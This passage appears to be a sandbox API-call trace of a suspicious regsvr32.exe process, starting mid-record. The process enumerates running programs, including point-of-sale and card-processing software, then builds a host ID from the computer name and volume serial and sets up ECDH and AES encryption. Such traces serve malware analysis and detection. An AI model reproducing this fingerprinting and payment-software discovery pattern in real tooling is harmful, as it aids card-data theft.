th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0097.373] GetCurrentProcessId () returned 0xde0 [0097.373] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0097.374] GetCurrentProcessId () returned 0xde0 [0097.374] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0097.375] GetCurrentProcessId () returned 0xde0 [0097.375] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0097.375] GetCurrentProcessId () returned 0xde0 [0097.375] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0097.376] GetCurrentProcessId () returned 0xde0 [0097.376] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0097.377] GetCurrentProcessId () returned 0xde0 [0097.377] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0097.377] GetCurrentProcessId () returned 0xde0 [0097.377] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0097.378] GetCurrentProcessId () returned 0xde0 [0097.378] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0097.379] GetCurrentProcessId () returned 0xde0 [0097.379] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0097.380] GetCurrentProcessId () returned 0xde0 [0097.380] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0097.380] GetCurrentProcessId () returned 0xde0 [0097.380] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0097.381] GetCurrentProcessId () returned 0xde0 [0097.381] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0097.382] GetCurrentProcessId () returned 0xde0 [0097.382] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0097.382] GetCurrentProcessId () returned 0xde0 [0097.382] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0097.383] GetCurrentProcessId () returned 0xde0 [0097.383] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0097.384] GetCurrentProcessId () returned 0xde0 [0097.384] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0097.384] GetCurrentProcessId () returned 0xde0 [0097.384] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1050, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="answerelectionthroughout.exe")) returned 1 [0097.385] GetCurrentProcessId () returned 0xde0 [0097.385] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x66c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0097.386] GetCurrentProcessId () returned 0xde0 [0097.386] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.386] GetCurrentProcessId () returned 0xde0 [0097.386] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x12dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x354, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0097.387] GetCurrentProcessId () returned 0xde0 [0097.387] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x12ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x354, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0097.388] GetCurrentProcessId () returned 0xde0 [0097.388] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x13a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0097.389] GetCurrentProcessId () returned 0xde0 [0097.389] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x13fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x38c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0097.390] GetCurrentProcessId () returned 0xde0 [0097.390] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0097.390] GetCurrentProcessId () returned 0xde0 [0097.390] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xb54, pcPriClassBase=8, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0097.391] GetCurrentProcessId () returned 0xde0 [0097.391] CloseHandle (hObject=0x1fc) returned 1 [0097.391] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0xb54) returned 0x0 [0097.392] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1fc [0097.393] GetProcessHeap () returned 0x500000 [0097.393] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x120) returned 0x522a70 [0097.393] GetComputerNameA (in: lpBuffer=0xce4f0, nSize=0xce4dc | out: lpBuffer="XC64ZB", nSize=0xce4dc) returned 1 [0097.394] GetProcessHeap () returned 0x500000 [0097.394] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x8) returned 0x506c60 [0097.394] GetWindowsDirectoryW (in: lpBuffer=0xce260, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0097.394] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0xce248, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xce248*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0097.394] _snprintf (in: _Dest=0x522a78, _Count=0x104, _Format="%s_%08X" | out: _Dest="XC64ZB_0C287F38") returned 15 [0097.394] GetProcessHeap () returned 0x500000 [0097.395] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x506c60 | out: hHeap=0x500000) returned 1 [0097.395] GetProcessHeap () returned 0x500000 [0097.395] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x531830 [0097.395] GetProcessHeap () returned 0x500000 [0097.395] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x530c50 [0097.395] GetProcessHeap () returned 0x500000 [0097.395] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x531470 [0097.396] GetProcessHeap () returned 0x500000 [0097.396] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x210) returned 0x522ba0 [0097.397] GetProcessHeap () returned 0x500000 [0097.397] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528590 [0097.398] GetProcessHeap () returned 0x500000 [0097.398] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528450 [0097.398] GetProcessHeap () returned 0x500000 [0097.398] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5283d0 [0097.399] GetProcessHeap () returned 0x500000 [0097.399] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528050 [0097.399] GetProcessHeap () returned 0x500000 [0097.399] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528490 [0097.399] GetProcessHeap () returned 0x500000 [0097.399] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528130 [0097.399] GetProcessHeap () returned 0x500000 [0097.399] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528230 [0097.399] GetProcessHeap () returned 0x500000 [0097.399] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5282f0 [0097.400] GetProcessHeap () returned 0x500000 [0097.400] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528550 [0097.400] GetProcessHeap () returned 0x500000 [0097.400] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5281d0 [0097.400] GetProcessHeap () returned 0x500000 [0097.400] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5284b0 [0097.400] GetProcessHeap () returned 0x500000 [0097.400] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528070 [0097.400] GetProcessHeap () returned 0x500000 [0097.400] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527eb0 [0097.400] GetProcessHeap () returned 0x500000 [0097.400] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5282d0 [0097.400] GetProcessHeap () returned 0x500000 [0097.400] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528210 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528570 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528410 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527ef0 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528250 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5281b0 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528430 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527f30 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527fd0 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528090 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527e90 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528150 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528310 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527f10 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5280b0 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528170 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5285d0 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527f50 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527fb0 [0097.401] GetProcessHeap () returned 0x500000 [0097.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527ed0 [0097.401] GetProcessHeap () returned 0x500000 [0097.402] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5284d0 [0097.402] GetProcessHeap () returned 0x500000 [0097.402] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5281f0 [0097.402] GetProcessHeap () returned 0x500000 [0097.402] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528470 [0097.402] GetProcessHeap () returned 0x500000 [0097.402] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5282b0 [0097.402] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528290 [0097.403] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5284f0 [0097.403] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528270 [0097.403] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528330 [0097.403] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527ff0 [0097.403] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5280d0 [0097.403] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5280f0 [0097.403] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5283b0 [0097.403] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528110 [0097.403] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527f70 [0097.403] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527e50 [0097.403] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528350 [0097.403] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5283f0 [0097.403] GetProcessHeap () returned 0x500000 [0097.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528370 [0097.405] GetProcessHeap () returned 0x500000 [0097.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528390 [0097.405] GetProcessHeap () returned 0x500000 [0097.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x528510 [0097.406] GetProcessHeap () returned 0x500000 [0097.406] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527f90 [0097.406] GetProcessHeap () returned 0x500000 [0097.406] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5285b0 [0097.406] GetProcessHeap () returned 0x500000 [0097.406] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x527e70 [0097.406] GetProcessHeap () returned 0x500000 [0097.406] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x512b60 [0097.406] GetProcessHeap () returned 0x500000 [0097.406] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x512b80 [0097.406] GetProcessHeap () returned 0x500000 [0097.406] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x531f10 [0097.406] GetProcessHeap () returned 0x500000 [0097.406] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x531f30 [0097.406] GetProcessHeap () returned 0x500000 [0097.406] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x531ef0 [0097.406] GetProcessHeap () returned 0x500000 [0097.406] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5319d0 [0097.406] GetProcessHeap () returned 0x500000 [0097.407] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x522ba0 | out: hHeap=0x500000) returned 1 [0097.407] GetProcessHeap () returned 0x500000 [0097.407] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x78) returned 0x529780 [0097.408] GetProcessHeap () returned 0x500000 [0097.408] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x531f50 [0097.408] GetProcessHeap () returned 0x500000 [0097.408] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x530ca0 [0097.408] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xce3e0, pszAlgId="ECDH_P256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0xce3e0) returned 0x0 [0097.409] GetProcessHeap () returned 0x500000 [0097.409] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531f50 | out: hHeap=0x500000) returned 1 [0097.409] GetProcessHeap () returned 0x500000 [0097.409] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x530ca0 | out: hHeap=0x500000) returned 1 [0097.409] BCryptGenerateKeyPair (in: hAlgorithm=0x5320b0, phKey=0xce3d8, dwLength=0x100, dwFlags=0x0 | out: hAlgorithm=0x5320b0, phKey=0xce3d8) returned 0x0 [0097.409] BCryptFinalizeKeyPair (in: hKey=0x530250, dwFlags=0x0 | out: hKey=0x530250) returned 0x0 [0097.410] GetProcessHeap () returned 0x500000 [0097.410] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x530520 [0097.410] BCryptExportKey (in: hKey=0x530250, hExportKey=0x0, pszBlobType="ECCPUBLICBLOB", pbOutput=0xce410, cbOutput=0x48, pcbResult=0xce3d0, dwFlags=0x0 | out: pbOutput=0xce410, pcbResult=0xce3d0) returned 0x0 [0097.410] GetProcessHeap () returned 0x500000 [0097.411] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x530520 | out: hHeap=0x500000) returned 1 [0097.411] GetProcessHeap () returned 0x500000 [0097.411] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x5300d0 [0097.411] BCryptImportKeyPair (in: hAlgorithm=0x5320b0, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0xce3e8, pbInput=0x531830, cbInput=0x48, dwFlags=0x0 | out: phKey=0xce3e8) returned 0x0 [0097.416] GetProcessHeap () returned 0x500000 [0097.416] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5300d0 | out: hHeap=0x500000) returned 1 [0097.417] BCryptSecretAgreement (in: hPrivKey=0x530250, hPubKey=0x530670, phAgreedSecret=0xce3f0, dwFlags=0x0 | out: phAgreedSecret=0xce3f0) returned 0x0 [0097.417] GetProcessHeap () returned 0x500000 [0097.417] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x8) returned 0x506c60 [0097.417] GetProcessHeap () returned 0x500000 [0097.417] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x5317e0 [0097.417] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xce2a8, pszAlgId="AES", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0xce2a8) returned 0x0 [0097.418] GetProcessHeap () returned 0x500000 [0097.418] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x506c60 | out: hHeap=0x500000) returned 1 [0097.418] GetProcessHeap () returned 0x500000 [0097.418] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5317e0 | out: hHeap=0x500000) returned 1 [0097.418] GetProcessHeap () returned 0x500000 [0097.418] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10) returned 0x531f70 [0097.418] GetProcessHeap () returned 0x500000 [0097.418] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10) returned 0x531dd0 [0097.418] lstrlenW (lpString="SHA256") returned 6 [0097.418] BCryptDeriveKey (in: hSharedSecret=0x531d30, pwszKDF="HASH", pParameterList=0xce2b0, pbDerivedKey=0xce2ec, cbDerivedKey=0x20, pcbResult=0xce2a4, dwFlags=0x0 | out: pbDerivedKey=0xce2ec, pcbResult=0xce2a4) returned 0x0 [0097.420] GetProcessHeap () returned 0x500000 [0097.420] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531f70 | out: hHeap=0x500000) returned 1 [0097.420] GetProcessHeap () returned 0x500000 [0097.420] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531dd0 | out: hHeap=0x500000) returned 1 [0097.420] GetProcessHeap () returned 0x500000 [0097.420] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x5305b0 [0097.420] BCryptGetProperty (in: hObject=0x532b60, pszProperty="ObjectLength", pbOutput=0x529788, cbOutput=0x4, pcbResult=0xce2a4, dwFlags=0x0 | out: pbOutput=0x529788, pcbResult=0xce2a4) returned 0x0 [0097.420] GetProcessHeap () returned 0x500000 [0097.420] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5305b0 | out: hHeap=0x500000) returned 1 [0097.421] GetProcessHeap () returned 0x500000 [0097.421] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28e) returned 0x532ca0 [0097.421] GetProcessHeap () returned 0x500000 [0097.421] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x531e50 [0097.421] BCryptImportKey (in: hAlgorithm=0x532b60, hImportKey=0x0, pszBlobType="KeyDataBlob", phKey=0x529790, pbKeyObject=0x532ca0, cbKeyObject=0x28e, pbInput=0xce2e0, cbInput=0x2c, dwFlags=0x0 | out: phKey=0x529790, pbKeyObject=0x532ca0) returned 0x0 [0097.421] GetProcessHeap () returned 0x500000 [0097.421] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531e50 | out: hHeap=0x500000) returned 1 [0097.421] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x532b60, dwFlags=0x0 | out: hAlgorithm=0x532b60) returned 0x0 [0097.421] BCryptDestroySecret (in: hSecret=0x531d30 | out: hSecret=0x531d30) returned 0x0 [0097.421] BCryptDestroyKey (in: hKey=0x530670 | out: hKey=0x530670) returned 0x0 [0097.421] BCryptDestroyKey (in: hKey=0x530250 | out: hKey=0x530250) returned 0x0 [0097.421] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5320b0, dwFlags=0x0 | out: hAlgorithm=0x5320b0) returned 0x0 [0097.422] GetProcessHeap () returned 0x500000 [0097.422] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x531e10 [0097.422] GetProcessHeap () returned 0x500000 [0097.422] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x530c00 [0097.422] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xce460, pszAlgId="ECDSA_P256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0xce460) returned 0x0 [0097.422] GetProcessHeap () returned 0x500000 [0097.422] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531e10 | out: hHeap=0x500000) returned 1 [0097.422] GetProcessHeap () returned 0x500000 [0097.423] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x530c00 | out: hHeap=0x500000) returned 1 [0097.423] GetProcessHeap () returned 0x500000 [0097.423] 